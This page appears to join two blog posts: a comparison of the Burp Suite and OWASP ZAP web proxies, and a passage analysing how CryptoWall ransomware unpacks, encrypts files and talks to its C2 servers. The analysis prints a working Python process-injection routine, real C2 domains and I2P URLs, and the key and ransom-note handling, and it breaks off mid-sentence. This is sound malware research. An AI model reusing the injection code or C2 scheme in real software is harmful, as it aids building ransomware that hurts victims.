Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.

:::DISCLAIMER:::

I am no expert in either tool; however, I have used them enough to feel comfortable documenting their features in this post. Please comment if you see an error or want to point out something I missed.

Introduction

Both OWASP ZAP and Burp Suite are intercepting proxies (on steroids) that sit between the browser and the web server to intercept and manipulate the requests and responses they exchange.

OWASP ZAP is a free and open-source project actively maintained by volunteers, while Burp Suite is a commercial product maintained and sold by PortSwigger. Both have appeared on almost every top-10 tools list of the year. In this post, I will compare version 2020.x of Burp Suite, which saw its first release in January 2020.

Since they emerged on the market, both have been gaining momentum and users, as Google Trends shows for the past 5 years (2015–2020). Hopefully, by the end of this post, you will have a better understanding of their similarities and differences.

Google Trends (2015–2020): Burp Suite in blue, OWASP ZAP in red

I will discuss the differences between both tools with regard to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while it becomes intuitive and shows all the necessary info you need. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar – Provides most of the functionality of Burp in simple tabs
  3. Status Bar – Provides information on memory and disk space used by Burp (a handy new feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities; active only in the paid Burp Suite Pro and Enterprise editions
  6. Tasks menu – Provides simple information and control over currently running, paused, and finished tasks

ZAP likewise has a simple interface consisting of 6 simple items.

ZAP 2.8.0 user interface. Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both Burp Suite and ZAP have good sets of capabilities; however, in some areas one tool excels over the other. We will get to each one further down in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto-check for updates feature.
  • Save and Load Project files.
  • Exposed and usable APIs.
  • Passive and Active scan engine.
  • Session token entropy analysis (Burp only; if you know that ZAP supports this, even with add-ons, please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
  • Diff-like capability or comparison feature (Burp only; AFAIK no out-of-the-box support in ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features, so if you know of one I missed, please comment below.

3. User experience

A while back, I had to use both tools for a comparison. While I am more used to Burp Suite at first look, OWASP ZAP offers the same functionality but has to be enhanced with plugins. Keep in mind there is an easy learning curve for both.
For example, ZAP has one fuzzer window, which makes it harder to search fuzzer results, especially when you run multiple fuzzers; Burp, by contrast, has a separate window and configuration for each fuzz conducted, which lets you sort and search fuzzing results faster and more effectively. The same goes for other features.
Also, unlike in Burp, you can't change (add, edit or remove) HTTP headers in ZAP's fuzzer window.

Zap 2.8.0 Fuzzer window
Burp 2020.2.1 Fuzzer window

Which one do you find more intuitive?

One big plus for Burp is the Comparer tab; it allows for easier change detection, like spotting differences in size caused by time changes, tokens, or content. ZAP lacks this feature without extensions (comment below which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is searching for text in the request or server response; Burp makes this more accessible, letting you search by plain text or regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than ZAP is the ability to test token entropy and randomness for cryptographic analysis. This is very useful when session cookies are custom-generated.

Burp Sequencer runs statistics on tokens and calculates entropy

However, one big plus for ZAP is its API, which makes for easier integration and automation than Burp. You can access the API from the browser or from other user agents like curl, or via SDKs/libraries.

The Burp Suite community edition API can only be used to write plugins and extensions, unlike ZAP's, which can be used in DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018, which makes it easier to integrate Burp with other tools and workflows.

An example is using the API to spider a host and fetch the results, e.g. crawling testphp.vulnweb.com from the console, as the sketch below shows.
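
A minimal sketch of that workflow against ZAP's JSON API (assuming a local ZAP instance on localhost:8080 with the API key requirement disabled):

import time
import requests

ZAP = "http://localhost:8080"          # default ZAP API address
TARGET = "http://testphp.vulnweb.com"

# start the spider against the target
scan_id = requests.get(f"{ZAP}/JSON/spider/action/scan/",
                       params={"url": TARGET}).json()["scan"]

# poll until the crawl reports 100% complete
while int(requests.get(f"{ZAP}/JSON/spider/view/status/",
                       params={"scanId": scan_id}).json()["status"]) < 100:
    time.sleep(2)

# print every URL the spider discovered
results = requests.get(f"{ZAP}/JSON/spider/view/results/",
                       params={"scanId": scan_id}).json()["results"]
print("\n".join(results))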

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines, no matter how big or small your environment is.

ZAP API in action

For a while, only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security Academy.

4. Pros and Cons of each tool

In my experience, ZAP is good when it comes to DevOps/DevSecOps for its easier API integration and support, while Burp is more oriented towards actual vulnerability assessment and penetration testing of web applications.

Given the different price points of the two tools, it is up to your scenario to decide whether more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, while OWASP ZAP is a free and open-source project under the Apache 2.0 License.

In conclusion, both tools are good in their own ways and use cases. Tell me which tool you like and your tips and tricks for ZAP or Burp (●’◡’●)

Genetic Analysis of CryptoWall Ransomware

Original text by Ryan Cornateanu

A strain of the Crowti ransomware family, a variant known as CryptoWall, was spotted by researchers in early 2013. Ransomware by nature is extraordinarily destructive, but this one in particular went a bit beyond that. Over the next 2 years, with over 5.25 billion files encrypted and 1 million+ systems infected, this virus definitely made its mark in the pool of cyber weapons. Below you can find a list of the top ten infected countries:

Source: Dell Secure Works

CryptoWall is distinct in that its campaign ID initially gets sent back to its C2 servers for verification purposes. The motivation behind these IDs is to track samples by their loader vectors. The one we will be analyzing in our laboratory experiment has the crypt1 ID, first seen around February 26th, 2014. The infection vector is still unknown today, but we will show how to unpack the loader and extract the main ransomware file. Some of the contagions have been caused by drive-by downloads, Cutwail/Upatre, the Infinity/Goon exploit kit, the Magnitude exploit kit, the Nuclear exploit kit/Pony Loader, and Gozi/Neverquest.

Initial Analysis

We will start by providing the hash of the packed loader file:

➜  CryptoWall git:(master) openssl md5 cryptowall.bin
MD5(cryptowall.bin)= 47363b94cee907e2b8926c1be61150c7

Running the file command on the bin executable, we can confirm that this is a PE32 executable (GUI) Intel 80386, for MS Windows. Similar to the analysis we did on Cozy Bear's Beacon Loader, we will be using IDA Pro as our disassembler of choice.

Loading the packed executable into our control flow graph view, it becomes apparent fairly quickly that this is packed loader code, and the real CryptoWall code is hiding somewhere within.

WinMain CFG View

Checking the resource section of this binary only shows that it has two valid entries, the first one being 91,740 bytes in size. Maybe we will get lucky and the hidden PE will be here?

Dumped resource section

Unfortunately not! This looks like some custom base64-encoded data that will hopefully get used somewhere down the line in our dissection of the virus. If we scroll down to the end of WinMain(), you'll notice a jump instruction that points to EAX. It will look something like this in the decompiler view:

JUMPOUT(eax=decrypted_code_segment);

Unpacking Binary Loaders

At this point, we have to open up a debugger and view this area of code as it is resolved dynamically. Set a breakpoint at 0x00402dda, which is the location of the jmp instruction. Once you hit this breakpoint after continuing execution, you'll notice EAX now points to a new segment of code. Dumping EAX in the disassembler will lead you to the 2nd-stage loader. Use the debugger's step-into feature, and our instruction pointer should be safely inside the decrypted loader area.

2nd Stage

Let's go over what is happening at this stage of the malware. EBP+var_EA6E gets loaded effectively into EDX. EAX then holds the index count incrementer used to follow the next few bytes at data address 302C9AEh.

.data:0302CA46   mov     bl, byte ptr (loc_302C9AE - 302C9AEh)[eax]
.data:0302CA48   add     ebx, esi
.data:0302CA4A   mov     [edx], bl

All this snippet of code is doing is loading bytes from the address mentioned above and storing them in bl (the lower 8 bits of EBX). The byte in bl is then moved into the pointer value of EDX. At the end of this routine, EBP+var_EA6E will hold a valid address that gets called via EAX (we can see the line highlighted in red in the image above). Stepping into EAX will now bring us to the third stage of the loading process.

A lot is going on at this point; this function has a couple thousand lines of assembly to go over, so it's better to open the decompiler view to see what is happening. After resolving some of the strings on the stack, some key information starts to pop up about the resource section we viewed earlier.

pLockRsrc = GetProcAddress(kernel32, &LockResource);
pSizeofResource = GetProcAddress(kernel32, &SizeofResource);
pLoadResource = GetProcAddress(kernel32, &LoadResource);
pGetModuleHandle = GetProcAddress(kernel32, &GetModuleHandleA);
pFindRsrc = GetProcAddress(kernel32, &FindResourceA);
pVirtualAlloc = GetProcAddress(kernel32, &VirtualAlloc);

The malware dynamically loads all of the functions that deal with our resource section. After the data gets loaded into memory, CryptoWall begins its custom base64 decoding technique and then continues to a decryption method, described below.

Most of what is happening here is explained in a decryptor I wrote that resolves the shellcode from the resource section. If you head over to the python script, you'll notice the custom base64 decoder is fairly simple. It uses a hardcoded charset and checks whether each byte from the resource section matches a byte from the charset; on a match, it breaks from the loop. The next character gets subtracted by one and compared to zero; if greater, the value is reduced modulo 256, and the resulting byte is stored in a buffer array. It performs this in a loop 89,268 times, as that is the size of the encoded string inside the resource section.

Secondary to this, another decryption process starts on the data we just decoded with the algorithm above. Looking at the python script again, we can see the hardcoded XOR keys that were extracted in the debugger by setting a breakpoint inside the decryption loop. All that is happening here is that each byte gets decrypted by a rotating three-byte key. Once the loop is finished, the code returns the address of the decrypted contents, which essentially just contains the address of another subroutine:

loop:
    buffer = *(base_addr + idx) - (*n ^ (&addr + 0xFFE6DF5F + idx));
    *(base_addr + idx++) = buffer;

Fourth_Stage_Loader = base_addr;
return (&Fourth_Stage_Loader)(buffer, b64_decoded_str, a1);
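
Stripped of the pointer arithmetic, the rotating-key XOR pass reduces to a few lines of python. This is only a sketch: decoded_resource stands for the output of the base64 step, and the three key bytes are placeholders for the values recovered in the debugger.

def rotating_xor(data: bytes, key: bytes) -> bytes:
    # each byte is XORed with the key byte at position i mod len(key),
    # so a 3-byte key repeats every 3 bytes
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# placeholder key bytes; the real ones were pulled from the debugger
shellcode = rotating_xor(decoded_resource, bytes([0x41, 0x42, 0x43]))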

The base_addr transfers data to another variable that we named Fourth_Stage_Loader, which holds the address of the newest function and can be used as a caller. If we dump the address at call dword ptr gs:(loc_1920A1-1920A1h)[eax] into memory, you'll see bytes that start with a generic x86 function prologue like 55 8b ec 81. Dump this to a file, and we can actually emulate this shellcode. In doing so, we don't have to step through all this code in the debugger; instead it will hopefully tell us how to unpack and get to the main CryptoWall file.

Side note: the python script I wrote will automatically decode & decrypt the resource section, and dump it to a bin file by running => python decrypt_shellcode_loader.py -e.

0x1000: push ebp
0x1001: mov ebp, esp
0x1003: add esp, 0xfffff004
....

An easy way to see what this next stage of the malware's loader is doing is to use one of my favorite shellcode emulator tools, ScDbg. With it, we can figure out exactly where to set our breakpoints in order to get to the main ransomware file. We are going to look for calls such as VirtualAlloc, WriteProcessMemory, CreateProcessA, etc.

C:\> scdbg.exe /s 3200000 /bp WriteProcessMemory /f dump.bin
Loaded 10587 bytes from file extractions/pe_process_injector_dump.bin
Breakpoint 0 set at 7c802213
Initialization Complete..
Max Steps: 3200000
Using base offset: 0x401000
4011cf GetProcAddress(LoadLibraryA)
40165f GetProcAddress(VirtualAlloc)
401c46 GetProcAddress(GetCurrentProcessId)
401c52 GetCurrentProcessId() = 29
...
401d46 CloseHandle(18be)
401f40 VirtualAlloc(base=0 , sz=20400) = 600000
4021e1 VirtualAllocEx(pid=1269, base=400000 , sz=25000) = 621000
/* Breakpoint 0 hit at: 7c802213 */
4021fe WriteProcessMemory(pid=1269, base=400000 , buf=600000, sz=400, written=12fd70)
/* Breakpoint 0 hit at: 7c802213 */
40224e WriteProcessMemory(pid=1269, base=401000 , buf=600400, sz=16400, written=12fd70)

Interesting… it looks like the malware is allocating memory in its own process by using GetCurrentProcessId() and allocating a space large enough to inject a PE file into itself. After memory allocation, CryptoWall injects the payload file in two writes: once for the header, and a second time for the rest of the file. If you set a breakpoint at WriteProcessMemory and continue execution twice, you can dump the second argument (ECX) on the stack to see the hidden PE file, roughly as in the ctypes sketch below.
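
For illustration, the allocate-then-write-twice pattern seen in the log above looks roughly like this with python's ctypes. This is a sketch of the generic technique, not CryptoWall's own code; the access flags and the 0x400 header size mirror the scdbg output:

import ctypes

k32 = ctypes.windll.kernel32
k32.VirtualAllocEx.restype = ctypes.c_void_p      # avoid pointer truncation on 64-bit
k32.WriteProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.c_char_p, ctypes.c_size_t,
                                   ctypes.POINTER(ctypes.c_size_t)]

PROCESS_ALL_ACCESS = 0x1F0FFF
MEM_COMMIT_RESERVE = 0x3000                       # MEM_COMMIT | MEM_RESERVE
PAGE_EXECUTE_READWRITE = 0x40

def inject_pe(pid: int, pe: bytes, header_size: int = 0x400) -> None:
    hproc = k32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    base = k32.VirtualAllocEx(hproc, None, len(pe),
                              MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    written = ctypes.c_size_t(0)
    # first write: just the PE headers (sz=400 in the log is hex 0x400)
    k32.WriteProcessMemory(hproc, base, pe[:header_size],
                           header_size, ctypes.byref(written))
    # second write: the remaining sections of the image
    k32.WriteProcessMemory(hproc, base + header_size, pe[header_size:],
                           len(pe) - header_size, ctypes.byref(written))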

There is an anti-VM trick along the way in the 3rd stage of the loader process that needs to be patched in order to reach the injection routine, so I wrote an x32Dbg python plugin to help automate the patching and dumping operation.

Reversing the Main Crypto Binary

CryptoWall's entry point starts off by dynamically resolving all imports, obtaining NTDLL's offsets via the process environment block (PEB).

It then calls a subroutine that takes the base address of the loaded DLL and uses many hardcoded DWORD offsets to locate hundreds of functions.

Side Note: If you would like to make your life a whole lot easier when resolving the function names in each subroutine, I made a local type definition for IDA Pro over here. The resolved import function table will look a lot cleaner than what you see above:

After the function returns, the malware will proceed to generate a unique hash based on your system information; the resulting concatenated string, e.g. DESKTOP-QR18J6QB0CBF8E8Intel64 Family 6 Model 70 Stepping 1, GenuineIntel, will be MD5 hashed. After computing the hash, it will set up a handle to an existing named event object with the specified desired access, called \\BaseNamedObjects\\C6B359277232C8E248AFD89C98E96D65.

The main engine of the code starts a few routines after the malware checks for system information, events, anti-vm, and running processes.

Most of the time the ransomware will successfully inject its main thread into svchost rather than explorer, so let's follow that trail. Since this is a 32-bit binary, it's going to look for svchost.exe inside SysWOW64 instead of System32. After locating the full path, it creates a new thread using the RtlCreateUserThread() API call. Once the thread is created, NtResumeThread() is used on the process to start the ransomware_thread code. Debugging these types of threads can be a little convoluted, and setting breakpoints doesn't always work.

.text:00416F40     ransomware_thread proc near             ; DATA XREF: start+86↓o
.text:00416F40
.text:00416F40     var_14 = dword ptr -14h
.text:00416F40     var_10 = dword ptr -10h
.text:00416F40     var_C  = dword ptr -0Ch
.text:00416F40     var_8  = dword ptr -8
.text:00416F40     var_4  = dword ptr -4
.text:00416F40
.text:00416F40 000                 push    ebp
.text:00416F41 004                 mov     ebp, esp
.text:00416F43 004                 sub     esp, 14h
.text:00416F46 018                 call    ResolveImportsFromDLL
...

Using x32Dbg, you can set EIP to address 0x00416F40, since this thread does not depend on resources from any of the other code executed up to this point; this thread even utilizes the ResolveImportsFromDLL function we saw at the beginning of the program's entry point… meaning the forced instruction-pointer jump will not damage the integrity of the ransomware.

isHandleSet = SetSecurityHandle();
if ( isHandleSet && SetupC2String() )
{
    v8 = 0;
    v6 = 0;
    IsSuccess = WhichProcessToInject(&v8, &v6);
    if ( IsSuccess )
    {
        IsSuccess = StartThreadFromProcess(-1, InjectedThread, 0, 0, 0);
        FreeVirtualMemory(v8);
    }
}

The thread goes through a series of configurations that involve setting up security attributes, MD5-hashing the hostname of the infected system, and then choosing whether to inject new code into svchost or explorer. In order to start a new thread, the function WhichProcessToInject queries the registry path and checks permissions on which key values the malware has access to. Once chosen, the InjectedThread process resumes. Stepping into that thread, we can see the module is fairly small.

.text:00412E80     InjectedThread  proc near               ; DATA
.text:00412E80
.text:00412E80 000                 push    ebp
.text:00412E81 004                 mov     ebp, esp
.text:00412E83 004                 call    MainInjectedThread
.text:00412E88 004                 push    0
.text:00412E8A 008                 call    ReturnFunctionName
.text:00412E8F 008                 mov     eax, [eax+0A4h]
.text:00412E95 008                 call    eax
.text:00412E97 004                 xor     eax, eax
.text:00412E99 004                 pop     ebp
.text:00412E9A 000                 retn
.text:00412E9A     InjectedThread  endp

At address 0x00412E83, a subroutine gets called that brings the malware to the next series of functions, involving the C2 server configuration callback and the encryption of files. After the thread finishes executing, EAX resolves a function at offset +0x0A4, which shows RtlExitUserThread being invoked. Once we enter MainInjectedThread, you'll notice the first function at 0x00411B40 gives us the first clue of how the files will be encrypted.

.text:00411D06 06C                 push    0F0000000h
.text:00411D0B 070                 push    1
.text:00411D0D 074                 lea     edx, [ebp+reg_crypt_path]
.text:00411D10 074                 push    edx
.text:00411D11 078                 push    0
.text:00411D13 07C                 lea     eax, [ebp+var_8]
.text:00411D16 07C                 push    eax
.text:00411D17 080                 call    ReturnFunctionName
.text:00411D1C 080                 mov     ecx, [eax+240h]
.text:00411D22 080                 call    ecx             ; CryptAcquireContext

CryptAcquireContext is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). In our case, the CSP is Microsoft Enhanced Cryptographic Provider v1.0, which supports algorithms such as DES, HMAC, MD5, and RSA.

Once the CryptoContext is populated, the ransomware uses the MD5 hash created from the victim's system information and registers it as a key path, software\\C6B359277232C8E248AFD89C98E96D65. The ransom note is produced in a few steps. The first step is to generate the TOR addresses, which resolves four domains: http[:]//torforall[.]com, http[:]//torman2[.]com, http[:]//torwoman[.]com, and http[:]//torroadsters[.]com. These DNS records will be used later on to inject into the ransomware HTML file. Next, the note gets produced using the Win32 API function RtlDecompressBuffer to decompress the data with COMPRESSION_FORMAT_LZNT1. The compressed ransom note can be found in the .data section and consists of 0x52B8 bytes.

Decompressing the note is kind of a mess in python, as there is no built-in function that can do LZNT1 decompression (one workaround is sketched further below). You can find the actual call at address 0x004087F3.

.text:004087CF 024                 lea     ecx, [ebp+var_8]
.text:004087D2 024                 push    ecx
.text:004087D3 028                 mov     edx, [ebp+arg_4]
.text:004087D6 028                 push    edx
.text:004087D7 02C                 mov     eax, [ebp+arg_6]
.text:004087DA 02C                 push    eax
.text:004087DB 030                 mov     ecx, [ebp+var_18]
.text:004087DE 030                 push    ecx
.text:004087DF 034                 mov     edx, [ebp+var_C]
.text:004087E2 034                 push    edx
.text:004087E3 038                 movzx   eax, [ebp+var_12]
.text:004087E7 038                 push    eax
.text:004087E8 03C                 call    ReturnFunctionName
.text:004087ED 03C                 mov     ecx, [eax+178h]
.text:004087F3 03C                 call    ecx
// Decompiled below
(*RtlDecompressBuffer)(COMPRESSION_FORMAT_LZNT1,
                       uncompressed_buffer,
                       UncompressedBufferSize,
                       CompressedBuffer,
                       CompressedBufferSize,
                       FinalUncompressedSize);

After the function call, uncompressed_buffer will be a data-filled pointer to a caller-allocated buffer (allocated from a paged or non-paged pool) that receives the decompressed data from CompressedBuffer. This parameter is required and cannot be NULL, which is why there is an NtAllocateVirtualMemory() call on this parameter before it is passed to decompression. The script I wrote grabs the compressed data from the PE file, runs an LZNT1 decompression algorithm, and places the buffer in an HTML file, producing the ransom note that appears on the victim's system.
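
If you want to prototype that same step from python on Windows, one workaround is to let ntdll do the LZNT1 work via ctypes rather than reimplementing it; a sketch, with an illustrative output-buffer size:

import ctypes
from ctypes import wintypes

ntdll = ctypes.windll.ntdll
COMPRESSION_FORMAT_LZNT1 = 2

def lznt1_decompress(compressed: bytes, max_out: int = 0x10000) -> bytes:
    out = ctypes.create_string_buffer(max_out)
    final_size = wintypes.ULONG(0)
    status = ntdll.RtlDecompressBuffer(
        COMPRESSION_FORMAT_LZNT1,
        out, max_out,                    # caller-allocated output buffer
        compressed, len(compressed),     # compressed .data blob (0x52B8 bytes here)
        ctypes.byref(final_size))
    if status != 0:                      # 0 == STATUS_SUCCESS
        raise OSError(f"RtlDecompressBuffer failed: 0x{status & 0xFFFFFFFF:08X}")
    return out.raw[:final_size.value]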

Once the note is decompressed, the HTML fields are populated with multiple TOR addresses in subroutine sub_00414160(). The note is stored in memory, then a few more checks follow before the malware sends its first C2 POST request. Stepping into SendRequestToC2, located at 0x00416A50, the first thing we notice is a buffer being allocated 60 bytes of memory.

.text:00416A77 018                 push    3Ch
.text:00416A79 01C                 call    AllocateSetMemory
.text:00416A7E 01C                 add     esp, 4
.text:00416A81 018                 mov     [ebp+campaign_str], eax

All this information will eventually help us write a proper fake C2 server that can communicate with the ransomware, since CryptoWall's I2P servers are no longer active. The function around address 0x004052E0, which we labeled EncryptData_SendToC2, is responsible for taking our generated campaign string and sending it as an initial ping.

If you set a breakpoint at this function, you can see what the parameter contains: {1|crypt1|C6B359277232C8E248AFD89C98E96D65}. Once inside this module, you'll notice three key functions: one responsible for byte swapping, one implementing a key-scheduling algorithm, and one doing the actual encryption. The generated RC4 ciphertext will end up as a hex string:

85b088216433863bdb490295d5bd997b35998c027ed600c24d05a55cea4cb3deafdf4161e6781d2cd9aa243f5c12a717cf64944bc6ea596269871d29abd7e2

Command & Control Communication

The malware sets itself up for a POST request to its I2P addresses, cycling between proxy1-1-1.i2p & proxy2-2-2.i2p. It does this by using the function at 0x0040B880 to generate a random seed based on epoch time, and uses that to create a string of 11 to 16 bytes. This PRNG (pseudo-random number generator) string will be used as the POST request's URI and as the key for the byte-swapping function before the RC4 encryption.

To give an example: if our generated string is tfuzxqh6wf7mng, then after the function call that string turns into 67ffghmnqtuwxz. That string gets used for the 256-byte key-scheduling algorithm and for the POST request (i.e., http://proxy1-1-1.i2p/67ffghmnqtuwxz). You can find the reverse engineered algorithm here.

The next part takes this byte-swapped key and RC4-encrypts some campaign information that the malware has gathered, which unencrypted looks like this:

{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}

This blob consists of the campaign ID, an MD5-hashed unique computer identifier, a CUUID, and the victim's public IP address. After preparing this campaign string, the ransomware begins to resolve the two I2P addresses. Once CryptoWall sends its first ping to the C2 server, it expects back an RC4-encrypted string containing the public key that will be used to encrypt all the files on disk. The malware can decrypt this string using the same RC4 algorithm from earlier and parses the info from this block: {216|1pai7ycr7jxqkilp.onion|[pub_key]|US|[unique_id]}. The onion route is for the ransom note and is a personalized route that the victim can visit using a TOR browser. The site most likely contains further instructions on how to pay the ransom.
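
Putting the last few pieces together (URI generation, byte swap, campaign-string encryption), here is a sketch in python. The RC4 below is the textbook algorithm, and the sort stands in for the byte-swapping routine; it reproduces the tfuzxqh6wf7mng to 67ffghmnqtuwxz example above:

def rc4(key: bytes, data: bytes) -> bytes:
    # key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # pseudo-random generation algorithm (PRGA)
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

uri = "tfuzxqh6wf7mng"               # PRNG string, also used as the POST URI
rc4_key = "".join(sorted(uri))       # byte swap == lexicographic sort -> 67ffghmnqtuwxz
campaign = b"{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}"
print(rc4(rc4_key.encode(), campaign).hex())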

Since the C2 servers are no longer active, in order to know what our fake C2 server should send back to the malware, the parser logic had to be carefully dissected; it is located at 0x00405203.

In this block, the malware decrypts the data it received from the C2 server. Once decrypted, it stores the first byte in ECX and compares its hex value to 0x7B (char: '{'). Tracing this function call to the return value, the string returned has its brackets removed from start to end. At memory address 0x00404E69, a DWORD pointer at eax+2Ch holds our newly decrypted and somewhat parsed string, which is checked for a length greater than 0. If the buffer holds weight, we move on to the final processing of this string at 0x00404B00, which I dubbed ParseC2Data(). This function takes four parameters: char *datain, int datain_size, char *dataout, int dataout_size. The first blob of datain gets parsed up to the first 0x7C (char: '|'), extracting the victim id.

victim_id = GetXBytesFromC2Data(decrypted_block_data_from_c2, &hex_7c, &ptr_to_data_out);

ptr_to_data_out and EAX will now hold an ID number of 216 (we got that number because we placed it there in our fake C2). The next block of code parses the rest of the data:

while ( victim_id )
{
    if ( CopyMemoryToAnotherLocation(&some_buffer_to_copy_too, 8 * idx + 8) )
    {
        CopyBlocksofMemory(victim_id,
                           &some_buffer_to_copy_too[2 * idx + 1],
                           &some_buffer_to_copy_too[2 * idx]);
        ++idx;
        if ( ptr_to_data_out )
        {
            for ( i = 0; *(i + ptr_to_data_out) == 0x7C; ++i )
            {
                if ( CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
                                                 8 * idx + 8) )
                {
                    ++v9;
                    ++idx;
                }
            }
        }
    }
    victim_id = GetXBytesFromC2Data(0, &hex_7c_0, &ptr_to_data_out);
    ++v5;
    ++v9;
}

What's happening here is that for every occurrence of the character '|', we grab the next chunk of data and place it into some type of structure in memory. The data jumps X amount of times per loop until it reaches the last 0x7C byte; it will loop a total of four times. After this function returns, dataout will contain a pointer in memory to this local type, which we reversed to look like this:

struct _C2ResponseData
{
    int victim_id;
    char *onion_route;
    const char *szPemPubKey;
    char country_code[2];
    char unique_id[4];
};

Shortly after, there is a check to make sure the generated victim id is no greater than 0x3E8 (1000) and is not the unsigned value 0xFFFFFFFF (-1).

value_of_index = CheckID(*(*parsed_data_out->victim_id));
if ( value_of_index > 0x3E8 || value_of_index == 0xFFFFFFFF )
    value_of_index = 0x78;

I believe certain malware will often perform these checks throughout the parsing of the C2 response to make sure the data being fed back is authentic. Over at 0x00404F35, there is another check of how many times it tried to reach the command server. If the count reaches exactly 3, it moves on to check whether the onion route is valid; all CryptoWall variants hardcode the first string index with ASCII '1'. If the route does not start with this character, the malware tries to reach back for a different payload. The other anti-tamper check it makes on the onion route is a CRC32 hash of the payload: if the compressed route does not equal 0x63680E35, the malware tries one last time to compare against the DWORD value 0x30BBB749. The variant has two hardcoded 256-entry byte arrays against which it compares the encrypted values. Brute-forcing can take a long time but is possible with a python script that I made here. The checksum is quite simple: it takes each letter of the site string and XORs it against an unsigned value:

tmp = (ord(site[i]) ^ ret_value) & 0xff

It will take the tmp value and use it as an index into the hardcoded byte array to perform another XOR:

ret_value = struct.unpack("<I", bytes_array[tmp*4:(tmp*4)+4])[0] ^ (ret_value >> 8)
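
Stitching the two fragments into one routine, here is a sketch that assumes the hardcoded byte array is an ordinary little-endian CRC-32 lookup table:

import struct

def site_checksum(site: str, bytes_array: bytes) -> int:
    ret_value = 0xFFFFFFFF                      # assumed CRC-32 initial value
    for ch in site:
        tmp = (ord(ch) ^ ret_value) & 0xFF      # table index from the low byte
        entry = struct.unpack_from("<I", bytes_array, tmp * 4)[0]
        ret_value = entry ^ (ret_value >> 8)
    return ret_value                            # caller inverts this, see below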

The return value then gets inverted, giving us a 4-byte hash to verify against. Now the malware moves on to the main thread responsible for encrypting the victim's files at 0x00412988. The first function call in this thread is CryptAcquireContextW, which acquires a handle to a particular key container within a CSP. 16 bytes are then allocated using VirtualAlloc; this will be the buffer for the original key.

isDecompressed = CreateTextForRansomwareNote(0, 0, 0);
if ( !isRequestSuccess || !isDecompressed )
{
    remaining_c2_data = 0;
    while ( 1 )
    {
        isRequestSuccess = SecondRequestToC2(&rsa_key, &rsa_key_size,
                                             &remaining_c2_data);
        if ( isRequestSuccess )
            break;
        sleep(0x1388u);
    }
}

Once the text for the ransom note is decompressed, CryptoWall will place this note as an HTML, PNG, and TXT file inside every directory the virus passed through while encrypting documents. After this point, it will go through another round of requests to the I2P C2 servers to request another RSA 2048-bit public key. This key will be the one used for encryption. This strain performs a number of hardcoded hash checks on the data it gets back from the C2.

Decoding the Key

CryptoWall will use basic Win32 Crypto functions like CryptStringToBinaryA, CryptDecodeObjectEx, & CryptImportPublicKeyInfo to decode the returned RSA key. Then it will import the public key information into the provider, which returns a handle to the public key. After importing is finished, all stored data will go into a local type structure like this:

struct _KeyData
{
    char *key;
    int key_size;
    BYTE *hash_data_1;
    BYTE *hash_data_2;
};

// Gets used here at 0x00412B8C
if ( ImportKey_And_EncryptKey(
         cryptContext,
         rsa_key,
         rsa_key_size,
         OriginalKey->key,
         &OriginalKey->key_size,
         &OriginalKey->hash_data_1,
         &OriginalKey->hash_data_2) )
{

The next actions the malware takes are pretty basic for ransomware: it loops through every available drive and uses GetDriveTypeW to determine whether a disk drive is removable, fixed, CD-ROM, RAM disk, or a network drive. In our case, the C drive is the only open drive, which falls under the category DRIVE_FIXED. CryptoWall only checks whether the drive is a CD-ROM, because in that case it will not try to spread.

.text:00412C1B      mov     ecx, [ebp+driver_letter]
.text:00412C1E      push    ecx
.text:00412C1F      call    GetDriveTypeW
.text:00412C2C      cmp     eax, 5
.text:00412C2F      jz      skip_drive

EAX holds the integer value returned from the function call, which represents the type of drive associated with that number (5 == DRIVE_CDROM). You can find the documentation here.

The exciting part is near, as we are about to head over to where the malware duplicates the key it retrieved from our fake C2 server, at address 0x00412C7A. What is happening here is pretty straightforward, and we can show it in pseudo-code:

if (OriginalKey)
